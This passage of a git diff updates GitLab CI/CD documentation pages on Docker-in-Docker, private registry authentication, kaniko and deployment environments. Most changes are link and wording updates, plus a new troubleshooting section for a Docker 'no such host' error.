+90,7 @@ The Docker image has all of the `docker` tools installed and can run the job script in context of the image in privileged mode. We recommend you use [Docker-in-Docker with TLS enabled](#docker-in-docker-with-tls-enabled), -which is supported by [GitLab.com shared runners](../runners/README.md). +which is supported by [GitLab.com shared runners](../runners/index.md). You should always specify a specific version of the image, like `docker:19.03.12`. If you use a tag like `docker:stable`, you have no control over which version is used. @@ -577,7 +577,7 @@ don't work because a fresh Docker daemon is started with the service. ### Option 1: Run `docker login` -In [`before_script`](../yaml/README.md#before_script), run `docker +In [`before_script`](../yaml/index.md#before_script), run `docker login`: ```yaml @@ -682,10 +682,10 @@ There are multiple ways to define this authentication: - In [`pre_build_script`](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section) in the runner configuration file. -- In [`before_script`](../yaml/README.md#before_script). -- In [`script`](../yaml/README.md#script). +- In [`before_script`](../yaml/index.md#before_script). +- In [`script`](../yaml/index.md#script). -The following example shows [`before_script`](../yaml/README.md#before_script). +The following example shows [`before_script`](../yaml/index.md#before_script). The same commands apply for any solution you implement. ```yaml @@ -798,7 +798,7 @@ which can be avoided if a different driver is used, for example `overlay2`. ### Use the OverlayFS driver per project You can enable the driver for each project individually by using the `DOCKER_DRIVER` -[CI/CD variable](../yaml/README.md#variables) in `.gitlab-ci.yml`: +[CI/CD variable](../yaml/index.md#variables) in `.gitlab-ci.yml`: ```yaml variables: @@ -840,3 +840,30 @@ This issue occurs because Docker starts on TLS automatically. [use the Docker executor with the Docker image](#use-the-docker-executor-with-the-docker-image-docker-in-docker). - If you are upgrading from v18.09 or earlier, read our [upgrade guide](https://about.gitlab.com/blog/2019/07/31/docker-in-docker-with-docker-19-dot-03/). + +### Docker `no such host` error + +You may get an error that says +`docker: error during connect: Post https://docker:2376/v1.40/containers/create: dial tcp: lookup docker on x.x.x.x:53: no such host`. + +This issue can occur when the service's image name +[includes a registry hostname](../../ci/services/index.md#available-settings-for-services). For example: + +```yaml +image: docker:19.03.12 + +services: + - registry.hub.docker.com/library/docker:19.03.12-dind +``` + +A service's hostname is [derived from the full image name](../../ci/services/index.md#accessing-the-services). +However, the shorter service hostname `docker` is expected. +To allow service resolution and access, add an explicit alias for the service name `docker`: + +```yaml +image: docker:19.03.12 + +services: + - name: registry.hub.docker.com/library/docker:19.03.12-dind + alias: docker +``` diff --git a/doc/ci/docker/using_docker_images.md b/doc/ci/docker/using_docker_images.md index 29f4053f720..c2991ce66f9 100644 --- a/doc/ci/docker/using_docker_images.md +++ b/doc/ci/docker/using_docker_images.md @@ -5,7 +5,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w type: concepts, howto --- -# Run your CI/CD jobs in Docker containers +# Run your CI/CD jobs in Docker containers **(FREE)** You can run your CI/CD jobs in separate, isolated Docker containers. @@ -153,9 +153,9 @@ CI/CD jobs: from `Dockerfile` that may be overridden in the `.gitlab-ci.yml` file. 1. The runner attaches itself to a running container. 1. The runner prepares a script (the combination of - [`before_script`](../yaml/README.md#before_script), - [`script`](../yaml/README.md#script), - and [`after_script`](../yaml/README.md#after_script)). + [`before_script`](../yaml/index.md#before_script), + [`script`](../yaml/index.md#script), + and [`after_script`](../yaml/index.md#after_script)). 1. The runner sends the script to the container's shell `stdin` and receives the output. @@ -225,7 +225,7 @@ To access private container registries, the GitLab Runner process can use: To define which option should be used, the runner process reads the configuration in this order: - A `DOCKER_AUTH_CONFIG` variable provided as either: - - A [CI/CD variable](../variables/README.md) in the `.gitlab-ci.yml` file. + - A [CI/CD variable](../variables/index.md) in the `.gitlab-ci.yml` file. - A project's variables stored on the project's **Settings > CI/CD** page. - A `DOCKER_AUTH_CONFIG` variable provided as environment variable in the runner's `config.toml` file. - A `config.json` file in `$HOME/.docker` directory of the user running the process. @@ -322,7 +322,7 @@ Use one of the following methods to determine the value of `DOCKER_AUTH_CONFIG`: To configure a single job with access for `registry.example.com:5000`, follow these steps: -1. Create a [CI/CD variable](../variables/README.md) `DOCKER_AUTH_CONFIG` with the content of the +1. Create a [CI/CD variable](../variables/index.md) `DOCKER_AUTH_CONFIG` with the content of the Docker configuration file as the value: ```json @@ -395,7 +395,7 @@ To configure a Credentials Store: 1. Make GitLab Runner use it. There are two ways to accomplish this. Either: - Create a - [CI/CD variable](../variables/README.md) + [CI/CD variable](../variables/index.md) `DOCKER_AUTH_CONFIG` with the content of the Docker configuration file as the value: @@ -427,7 +427,7 @@ To configure access for `aws_account_id.dkr.ecr.region.amazonaws.com`, follow th Make sure that GitLab Runner can access the credentials. 1. Make GitLab Runner use it. There are two ways to accomplish this. Either: - - Create a [CI/CD variable](../variables/README.md) + - Create a [CI/CD variable](../variables/index.md) `DOCKER_AUTH_CONFIG` with the content of the Docker configuration file as the value: diff --git a/doc/ci/docker/using_kaniko.md b/doc/ci/docker/using_kaniko.md index 05769cc8f75..108d4e0dcad 100644 --- a/doc/ci/docker/using_kaniko.md +++ b/doc/ci/docker/using_kaniko.md @@ -5,7 +5,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w type: howto --- -# Use kaniko to build Docker images +# Use kaniko to build Docker images **(FREE)** > [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/45512) in GitLab 11.2. Requires GitLab Runner 11.2 and above. @@ -49,7 +49,7 @@ In the following example, kaniko is used to: The job runs only when a tag is pushed. A `config.json` file is created under `/kaniko/.docker` with the needed GitLab Container Registry credentials taken from the -[predefined CI/CD variables](../variables/README.md#predefined-cicd-variables) +[predefined CI/CD variables](../variables/index.md#predefined-cicd-variables) GitLab CI/CD provides. In the last step, kaniko uses the `Dockerfile` under the @@ -133,7 +133,7 @@ The [Least Privilege Container Builds with Kaniko on GitLab](https://www.youtube video is a walkthrough of the [Kaniko Docker Build](https://gitlab.com/guided-explorations/containers/kaniko-docker-build) Guided Exploration project pipeline. It was tested on: -- [GitLab.com shared runners](../runners/README.md) +- [GitLab.com shared runners](../runners/index.md) - [The Kubernetes runner executor](https://docs.gitlab.com/runner/executors/kubernetes.html) The example can be copied to your own group or instance for testing. More details diff --git a/doc/ci/enable_or_disable_ci.md b/doc/ci/enable_or_disable_ci.md index 4633cc1a3f8..341727f0f5d 100644 --- a/doc/ci/enable_or_disable_ci.md +++ b/doc/ci/enable_or_disable_ci.md @@ -5,13 +5,13 @@ info: To determine the technical writer assigned to the Stage/Group associated w type: howto --- -# How to enable or disable GitLab CI/CD +# How to enable or disable GitLab CI/CD **(FREE)** To effectively use GitLab CI/CD, you need: -- A valid [`.gitlab-ci.yml`](yaml/README.md) file present at the root directory +- A valid [`.gitlab-ci.yml`](yaml/index.md) file present at the root directory of your project. -- A [runner](runners/README.md) properly set up. +- A [runner](runners/index.md) properly set up. You can read our [quick start guide](quick_start/index.md) to get you started. diff --git a/doc/ci/environments/deployment_safety.md b/doc/ci/environments/deployment_safety.md index c57dc99f341..033e499d3d0 100644 --- a/doc/ci/environments/deployment_safety.md +++ b/doc/ci/environments/deployment_safety.md @@ -25,7 +25,8 @@ If you are using a continuous deployment workflow and want to ensure that concur ## Restrict write access to a critical environment -By default, environments can be modified by any team member that has [Developer permission or higher](../../user/permissions.md#project-members-permissions). +By default, environments can be modified by any team member that has at least the +[Developer role](../../user/permissions.md#project-members-permissions). If you want to restrict write access to a critical environment (for example a `production` environment), you can set up [protected environments](protected_environments.md). @@ -35,7 +36,7 @@ Pipeline jobs in GitLab CI/CD run in parallel, so it's possible that two deploym jobs in two different pipelines attempt to deploy to the same environment at the same time. This is not desired behavior as deployments should happen sequentially. -You can ensure only one deployment job runs at a time with the [`resource_group` keyword](../yaml/README.md#resource_group) in your `.gitlab-ci.yml`. +You can ensure only one deployment job runs at a time with the [`resource_group` keyword](../yaml/index.md#resource_group) in your `.gitlab-ci.yml`. For example: @@ -59,7 +60,7 @@ The improved pipeline flow **after** using the resource group: 1. `deploy` job in Pipeline-A finishes. 1. `deploy` job in Pipeline-B starts running. -For more information, see [`resource_group` keyword in `.gitlab-ci.yml`](../yaml/README.md#resource_group). +For more information, see [`resource_group` keyword in `.gitlab-ci.yml`](../yaml/index.md#resource_group). ## Skip outdated deployment jobs @@ -110,7 +111,7 @@ for an explanation of these roles and the permissions of each. Production secrets are needed to deploy successfully. For example, when deploying to the cloud, cloud providers require these secrets to connect to their services. In the project settings, you can -define and protect CI/CD variables for these secrets. [Protected variables](../variables/README.md#protect-a-cicd-variable) +define and protect CI/CD variables for these secrets. [Protected variables](../variables/index.md#protect-a-cicd-variable) are only passed to pipelines running on [protected branches](../../user/project/protected_branches.md) or [protected tags](../../user/project/protected_tags.md). The other pipelines don't get the protected variable. You can also @@ -129,7 +130,7 @@ All project maintainers have access to production secrets. If you need to limit that can deploy to a production environment, you can create a separate project and configure a new permission model that isolates the CD permissions from the original project and prevents the original project's maintainers from accessing the production secret and CD configuration. You can -connect the CD project to your development projects by using [multi-project pipelines](../multi_project_pipelines.md). +connect the CD project to your development projects by using [multi-project pipelines](../pipelines/multi_project_pipelines.md). ## Protect `gitlab-ci.yml` from change @@ -141,7 +142,7 @@ reference a file in another project with a completely different set of permissio In this scenario, the `gitlab-ci.yml` is publicly accessible, but can only be edited by users with appropriate permissions in the other project. -For more information, see [Custom CI/CD configuration path](../pipelines/settings.md#custom-cicd-configuration-file). +For more information, see [Custom CI/CD configuration path](../pipelines/settings.md#specify-a-custom-cicd-configuration-file). ## Troubleshooting diff --git a/doc/ci/environments/environments_dashboard.md b/doc/ci/environments/environments_dashboard.md index a89bc1c89aa..ae459b9016c 100644 --- a/doc/ci/environments/environments_dashboard.md +++ b/doc/ci/environments/environments_dashboard.md @@ -29,7 +29,7 @@ The Environments dashboard displays a paginated list of projects that includes up to three environments per project. The listed environments for each project are unique, such as -"production", "staging", etc. Review apps and other grouped +"production", "staging", and so on. Review apps and other grouped environments are not displayed. ## Adding a project to the dashboard diff --git a/doc/ci/environments/index.md b/doc/ci/environments/index.md index 62c58302886..e647a704a87 100644 --- a/doc/ci/environments/index.md +++ b/doc/ci/environments/index.md @@ -10,7 +10,7 @@ disqus_identifier: 'https://docs.gitlab.com/ee/ci/environments.html' Environments describe where code is deployed. -Each time [GitLab CI/CD](../yaml/README.md) deploys a version of code to an environment, +Each time [GitLab CI/CD](../yaml/index.md) deploys a version of code to an environment, a deployment is created. GitLab: @@ -84,7 +84,7 @@ When the job runs, the environment and deployment are created. NOTE: Some characters cannot be used in environment names. For more information about the `environment` keywords, see -[the `.gitlab-ci.yml` keyword reference](../yaml/README.md#environment). +[the `.gitlab-ci.yml` keyword reference](../yaml/index.md#environment). ### Create a dynamic environment @@ -107,7 +107,7 @@ deploy_review: In this example: -- The `name` is `review/$CI_COMMIT_REF_NAME`. Because the [environment name](../yaml/README.md#environmentname) +- The `name` is `review/$CI_COMMIT_REF_NAME`. Because the [environment name](../yaml/index.md#environmentname) can contain slashes (`/`), you can use this pattern to distinguish between dynamic and static environments. - For the `url`, you could use `$CI_COMMIT_REF_NAME`, but because this value may contain a `/` or other characters that would not be valid in a domain name or URL, @@ -119,7 +119,7 @@ However, when you use this format, you can [group similar environments](#group-s NOTE: Some variables cannot be used as environment names or URLs. For more information about the `environment` keywords, see -[the `.gitlab-ci.yml` keyword reference](../yaml/README.md#environment). +[the `.gitlab-ci.yml` keyword reference](../yaml/index.md#environment). ## Deployment tier of environments @@ -141,8 +141,8 @@ you can use tiers: | `development` | Dev, [Review apps](../review_apps/index.md), Trunk | | `other` | | -By default, GitLab assumes a tier based on [the environment name](../yaml/README.md#environmentname). -Instead, you can use the [`deployment_tier` keyword](../yaml/README.md#environmentdeployment_tier) to specify a tier. +By default, GitLab assumes a tier based on [the environment name](../yaml/index.md#environmentname). +Instead, you can use the [`deployment_tier` keyword](../yaml/index.md#environmentdeployment_tier) to specify a tier. ## Configure manual deployments @@ -250,7 +250,7 @@ GitLab supports the [dotenv (`.env`)](https://github.com/bkeepers/dotenv) file f and expands the `environment:url` value with variables defined in the `.env` file. To use this feature, specify the -[`artifacts:reports:dotenv`](../yaml/README.md#artifactsreportsdotenv) keyword in `.gitlab-ci.yml`. +[`artifacts:reports:dotenv`](../yaml/index.md#artifactsreportsdotenv) keyword in `.gitlab-ci.yml`. <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> For an overview, see [Set dynamic URLs after a job finished](https://youtu.be/70jDXtOf4Ig). @@ -302,7 +302,7 @@ Note the following: - If the environment URL isn't valid (for example, the URL is malformed), the system doesn't update the environment URL. - If the script that runs in `stop_review` exists only in your repository and therefore can't use - `GIT_STRATEGY: none`, configure [pipelines for merge requests](../../ci/merge_request_pipelines/index.md) + `GIT_STRATEGY: none`, configure [pipelines for merge requests](../../ci/pipelines/merge_request_pipelines.md) for these jobs. This ensures that runners can fetch the repository even after a feature branch is deleted. For more information, see [Ref Specs for Runners](../pipelines/index.md#ref-specs-for-runners). @@ -334,7 +334,7 @@ To retry or rollback a deployment: ### Environment URL -The [environment URL](../yaml/README.md#environmenturl) is displayed in a few +The [environment URL](../yaml/index.md#environmenturl) is displayed in a few places in GitLab: - In a merge request as a link: @@ -364,7 +364,7 @@ When you stop an environment: - On the **Environments** page, it moves from the list of **Available** environments to the list of **Stopped** environments. -- An [`on_stop` action](../yaml/README.md#environmenton_stop), if defined, is executed. +- An [`on_stop` action](../yaml/index.md#environmenton_stop), if defined, is executed. Dynamic environments stop automatically when their associated branch is deleted. @@ -400,20 +400,20 @@ stop_review: when: manual ``` -Both jobs must have the same [`rules`](../yaml/README.md#only--except) -or [`only/except`](../yaml/README.md#only--except) configuration. Otherwise, +Both jobs must have the same [`rules`](../yaml/index.md#only--except) +or [`only/except`](../yaml/index.md#only--except) configuration. Otherwise, the `stop_review` job might not be included in all pipelines that include the `deploy_review` job, and you cannot trigger `action: stop` to stop the environment automatically. The job with [`action: stop` might not run](#the-job-with-action-stop-doesnt-run) if it's in a later stage than the job that started the environment. -If you can't use [pipelines for merge requests](../merge_request_pipelines/index.md), +If you can't use [pipelines for merge requests](../pipelines/merge_request_pipelines.md), set the [`GIT_STRATEGY`](../runners/configure_runners.md#git-strategy) to `none` in the `stop_review` job. Then the [runner](https://docs.gitlab.com/runner/) doesn't try to check out the code after the branch is deleted. -Read more in the [`.gitlab-ci.yml` reference](../yaml/README.md#environmenton_stop). +Read more in the [`.gitlab-ci.yml` reference](../yaml/index.md#environmenton_stop). #### Stop an environment after a certain time period @@ -421,7 +421,7 @@ Read more in the [`.gitlab-ci.yml` reference](../yaml/README.md#environmenton_st You can set environments to stop automatically after a certain time period. -In your `.gitlab-ci.yml` file, specify the [`environment:auto_stop_in`](../yaml/README.md#environmentauto_stop_in) +In your `.gitlab-ci.yml` file, specify the [`environment:auto_stop_in`](../yaml/index.md#environmentauto_stop_in) keyword. You can specify a human-friendly date as the value, such as `1 hour and 30 minutes` or `1 day`. After the time period passes, GitLab automatically triggers a job to stop the environment. @@ -691,7 +691,7 @@ with `review/` would have that variable available. Some GitLab features can behave differently for each environment. For example, you can -[create a project CI/CD variable to be injected only into a production environment](../variables/README.md#limit-the-environment-scope-of-a-cicd-variable). +[create a project CI/CD variable to be injected only into a production environment](../variables/index.md#limit-the-environment-scope-of-a-cicd-variable). In most cases, these features use the _environment specs_ mechanism, which offers an efficient way to implement scoping in each environment group. @@ -767,7 +767,7 @@ To ensure the `action: stop` can always run when needed, you can: when: manual ``` -- Add a [`needs`](../yaml/README.md#needs) entry to the `action: stop` job so the +- Add a [`needs`](../yaml/index.md#needs) entry to the `action: stop` job so the job can start out of stage order: ```yaml diff --git a/doc/ci/environments/protected_environments.md b/doc/ci/environments/protected_environments.md index c276059cb9e..9bc3c97837c 100644 --- a/doc/ci/environments/protected_environments.md +++ b/doc/ci/environments/protected_environments.md @@ -39,7 +39,7 @@ To protect an environment: - **Maintainers**: Allows access to all maintainers in the project. - **Developers**: Allows access to all maintainers and all developers in the project. - You can only select groups that are already associated with the project. - - Only users that have at least the Developer permission level appear in + - Only users that have at least the Developer role appear in the **Allowed to Deploy** dropdown menu. 1. Click the **Protect** button. @@ -112,7 +112,7 @@ protected environments with this method. ## Deployment branch access -Users with [Developer permissions](../../user/permissions.md) can be granted +Users with the [Developer role](../../user/permissions.md) can be granted access to a protected environment through any of these methods: - As an individual contributor, through a role. diff --git a/doc/ci/examples/README.md b/doc/ci/examples/README.md index 90273190697..5ab8653dc35 100644 --- a/doc/ci/examples/README.md +++ b/doc/ci/examples/README.md @@ -1,182 +1,8 @@ --- -stage: Verify -group: Pipeline Execution -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments -comments: false -type: index +redirect_to: 'index.md' --- -# GitLab CI/CD Examples +This document was moved to [another location](index.md). -This page contains links to a variety of examples that can help you understand how to -implement [GitLab CI/CD](../README.md) for your specific use case. - -Examples are available in several forms. As a collection of: - -- `.gitlab-ci.yml` [template files](#cicd-templates) maintained in GitLab, for many - common frameworks and programming languages. -- Repositories with [example projects](https://gitlab.com/gitlab-examples) for various languages. You can fork and adjust them to your own needs. Projects include an example of using [Review Apps with a static site served by NGINX](https://gitlab.com/gitlab-examples/review-apps-nginx/). -- Examples and [other resources](#other-resources) listed below. - -## CI/CD examples - -The following table lists examples with step-by-step tutorials that are contained in this section: - -| Use case | Resource | -|-------------------------------|----------| -| Browser performance testing | [Browser Performance Testing with the Sitespeed.io container](../../user/project/merge_requests/browser_performance_testing.md). | -| Deployment with Dpl | [Using `dpl` as deployment tool](deployment/README.md). | -| GitLab Pages | See the [GitLab Pages](../../user/project/pages/index.md) documentation for a complete example of deploying a static site. | -| End-to-end testing | [End-to-end testing with GitLab CI/CD and WebdriverIO](end_to_end_testing_webdriverio/index.md). | -| Load performance testing | [Load Performance Testing with the k6 container](../../user/project/merge_requests/load_performance_testing.md). | -| Multi project pipeline | [Build, test deploy using multi project pipeline](https://gitlab.com/gitlab-examples/upstream-project). | -| npm with semantic-release | [Publish npm packages to the GitLab Package Registry using semantic-release](semantic-release.md). | -| PHP with Laravel, Envoy | [Test and deploy Laravel applications with GitLab CI/CD and Envoy](laravel_with_gitlab_and_envoy/index.md). | -| PHP with npm, SCP | [Running Composer and npm scripts with deployment via SCP in GitLab CI/CD](deployment/composer-npm-deploy.md). | -| PHP with PHPunit, `atoum` | [Testing PHP projects](php.md). | -| Secrets management with Vault | [Authenticating and Reading Secrets With HashiCorp Vault](authenticating-with-hashicorp-vault/index.md). | - -### Contributed examples - -You can help people that use your favorite programming language by submitting a link -to a guide for that language. These contributed guides are hosted externally or in -separate example projects: - -| Use case | Resource | -|-------------------------------|----------| -| Clojure | [Test a Clojure application with GitLab CI/CD](https://gitlab.com/gitlab-examples/clojure-web-application). | -| Game development | [DevOps and Game Development with GitLab CI/CD](https://gitlab.com/gitlab-examples/gitlab-game-demo/). | -| Java with Maven | [How to deploy Maven projects to Artifactory with GitLab CI/CD](https://gitlab.com/gitlab-examples/maven/simple-maven-example). | -| Java with Spring Boot | [Deploy a Spring Boot application to Cloud Foundry with GitLab CI/CD](https://gitlab.com/gitlab-examples/spring-gitlab-cf-deploy-demo). | -| Parallel testing Ruby & JS | [GitLab CI/CD parallel jobs testing for Ruby & JavaScript projects](https://docs.knapsackpro.com/2019/how-to-run-parallel-jobs-for-rspec-tests-on-gitlab-ci-pipeline-and-speed-up-ruby-javascript-testing). | -| Python on Heroku | [Test and deploy a Python application with GitLab CI/CD](https://gitlab.com/gitlab-examples/python-getting-started). | -| Ruby on Heroku | [Test and deploy a Ruby application with GitLab CI/CD](https://gitlab.com/gitlab-examples/ruby-getting-started). | -| Scala on Heroku | [Test and deploy a Scala application to Heroku](https://gitlab.com/gitlab-examples/scala-sbt). | - -## CI/CD templates - -Get started with GitLab CI/CD and your favorite programming language or framework by using a -`.gitlab-ci.yml` [template](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates). - -When you create a `gitlab-ci.yml` file in the UI, you can -choose one of these templates: - -- [Android (`Android.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Android.gitlab-ci.yml) -- [Android with fastlane (`Android-Fastlane.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Android-Fastlane.gitlab-ci.yml) -- [Bash (`Bash.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Bash.gitlab-ci.yml) -- [C++ (`C++.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/C++.gitlab-ci.yml) -- [Chef (`Chef.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Chef.gitlab-ci.yml) -- [Clojure (`Clojure.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Clojure.gitlab-ci.yml) -- [Composer `Composer.gitlab-ci.yml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Composer.gitlab-ci.yml) -- [Crystal (`Crystal.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Crystal.gitlab-ci.yml) -- [Dart (`Dart.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Dart.gitlab-ci.yml) -- [Django (`Django.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Django.gitlab-ci.yml) -- [Docker (`Docker.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Docker.gitlab-ci.yml) -- [dotNET (`dotNET.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/dotNET.gitlab-ci.yml) -- [dotNET Core (`dotNET-Core.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/dotNET-Core.yml) -- [Elixir (`Elixir.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Elixir.gitlab-ci.yml) -- [Flutter (`Flutter.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Flutter.gitlab-ci.yml) -- [goLang (`Go.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Go.gitlab-ci.yml) -- [Gradle (`Gradle.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Gradle.gitlab-ci.yml) -- [Grails (`Grails.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Grails.gitlab-ci.yml) -- [iOS with fastlane (`iOS-Fastlane.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/iOS-Fastlane.gitlab-ci.yml) -- [Julia (`Julia.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Julia.gitlab-ci.yml) -- [Laravel (`Laravel.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Laravel.gitlab-ci.yml) -- [LaTeX (`LaTeX.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/LaTeX.gitlab-ci.yml) -- [Maven (`Maven.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Maven.gitlab-ci.yml) -- [Mono (`Mono.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Mono.gitlab-ci.yml) -- [npm (`npm.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/npm.gitlab-ci.yml) -- [Node.js (`Nodejs.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Nodejs.gitlab-ci.yml) -- [OpenShift (`OpenShift.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/OpenShift.gitlab-ci.yml) -- [Packer (`Packer.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Packer.gitlab-ci.yml) -- [PHP (`PHP.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/PHP.gitlab-ci.yml) -- [Python (`Python.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Python.gitlab-ci.yml) -- [Ruby (`Ruby.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Ruby.gitlab-ci.yml) -- [Rust (`Rust.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Rust.gitlab-ci.yml) -- [Scala (`Scala.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Scala.gitlab-ci.yml) -- [Swift (`Swift.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Swift.gitlab-ci.yml) -- [Terraform (`Terraform.latest.gitlab-ci.yml`)](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Terraform.latest.gitlab-ci.yml) - -If a programming language or framework template is not in this list, you can contribute -one. To create a template, submit a merge request -to [the templates list](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates). - -### Adding templates to your GitLab installation **(PREMIUM SELF)** - -You can add custom examples and templates to your self-managed GitLab instance. -Your GitLab administrator can [designate an instance template repository](../../user/admin_area/settings/instance_template_repository.md) -that contains examples and templates specific to your organization. - -## Other resources - -This section provides further resources to help you get familiar with various uses of GitLab CI/CD. -Note that older articles and videos may not reflect the state of the latest GitLab release. - -### CI/CD in the cloud - -For examples of setting up GitLab CI/CD for cloud-based environments, see: - -- [How to set up multi-account AWS SAM deployments with GitLab CI](https://about.gitlab.com/blog/2019/02/04/multi-account-aws-sam-deployments-with-gitlab-ci/) -- [Automating Kubernetes Deployments with GitLab CI/CD](https://www.youtube.com/watch?v=wEDRfAz6_Uw) -- [How to autoscale continuous deployment with GitLab Runner on DigitalOcean](https://about.gitlab.com/blog/2018/06/19/autoscale-continuous-deployment-gitlab-runner-digital-ocean/) -- [How to create a CI/CD pipeline with Auto Deploy to Kubernetes using GitLab and Helm](https://about.gitlab.com/blog/2017/09/21/how-to-create-ci-cd-pipeline-with-autodeploy-to-kubernetes-using-gitlab-and-helm/) -- [Demo - Deploying from GitLab to OpenShift Container Cluster](https://youtu.be/EwbhA53Jpp4) - -See also the following video overviews: - -- [Kubernetes, GitLab, and Cloud Native](https://www.youtube.com/watch?v=d-9awBxEbvQ). -- [Deploying to IBM Cloud with GitLab CI/CD](https://www.youtube.com/watch?v=6ZF4vgKMd-g). - -### Customer stories - -For some customer experiences with GitLab CI/CD, see: - -- [How Verizon Connect reduced data center deploys from 30 days to under 8 hours with GitLab](https://about.gitlab.com/blog/2019/02/14/verizon-customer-story/) -- [How Wag! cut their release process from 40 minutes to just 6](https://about.gitlab.com/blog/2019/01/16/wag-labs-blog-post/) -- [How Jaguar Land Rover embraced CI to speed up their software lifecycle](https://about.gitlab.com/blog/2018/07/23/chris-hill-devops-enterprise-summit-talk/) - -### Getting started - -For some examples to help get you started, see: - -- [GitLab CI/CD's 2018 highlights](https://about.gitlab.com/blog/2019/01/21/gitlab-ci-cd-features-improvements/) -- [A beginner's guide to continuous integration](https://about.gitlab.com/blog/2018/01/22/a-beginners-guide-to-continuous-integration/) - -### Implementing GitLab CI/CD - -For examples of others who have implemented GitLab CI/CD, see: - -- [How to streamline interactions between multiple repositories with multi-project pipelines](https://about.gitlab.com/blog/2018/10/31/use-multiproject-pipelines-with-gitlab-cicd/) -- [How we used GitLab CI to build GitLab faster](https://about.gitlab.com/blog/2018/05/02/using-gitlab-ci-to-build-gitlab-faster/) -- [Test all the things in GitLab CI with Docker by example](https://about.gitlab.com/blog/2018/02/05/test-all-the-things-gitlab-ci-docker-examples/) -- [A Craftsman looks at continuous integration](https://about.gitlab.com/blog/2018/01/17/craftsman-looks-at-continuous-integration/) -- [Go tools and GitLab: How to do continuous integration like a boss](https://about.gitlab.com/blog/2017/11/27/go-tools-and-gitlab-how-to-do-continuous-integration-like-a-boss/) -- [GitBot – automating boring Git operations with CI](https://about.gitlab.com/blog/2017/11/02/automating-boring-git-operations-gitlab-ci/) -- [How to use GitLab CI for Vue.js](https://about.gitlab.com/blog/2017/09/12/vuejs-app-gitlab/) -- Video: [GitLab CI/CD Deep Dive](https://youtu.be/pBe4t1CD8Fc?t=195) -- [Dockerizing GitLab Review Apps](https://about.gitlab.com/blog/2017/07/11/dockerizing-review-apps/) -- [Fast and natural continuous integration with GitLab CI](https://about.gitlab.com/blog/2017/05/22/fast-and-natural-continuous-integration-with-gitlab-ci/) -- [Demo: CI/CD with GitLab in action](https://about.gitlab.com/blog/2017/03/13/ci-cd-demo/) - -### Migrating to GitLab from third-party CI tools - -- [Migrating from Jenkins to GitLab](https://youtu.be/RlEVGOpYF5Y) - -### Integrating GitLab CI/CD with other systems - -To see how you can integrate GitLab CI/CD with third-party systems, see: - -- [Streamline and shorten error remediation with Sentry's new GitLab 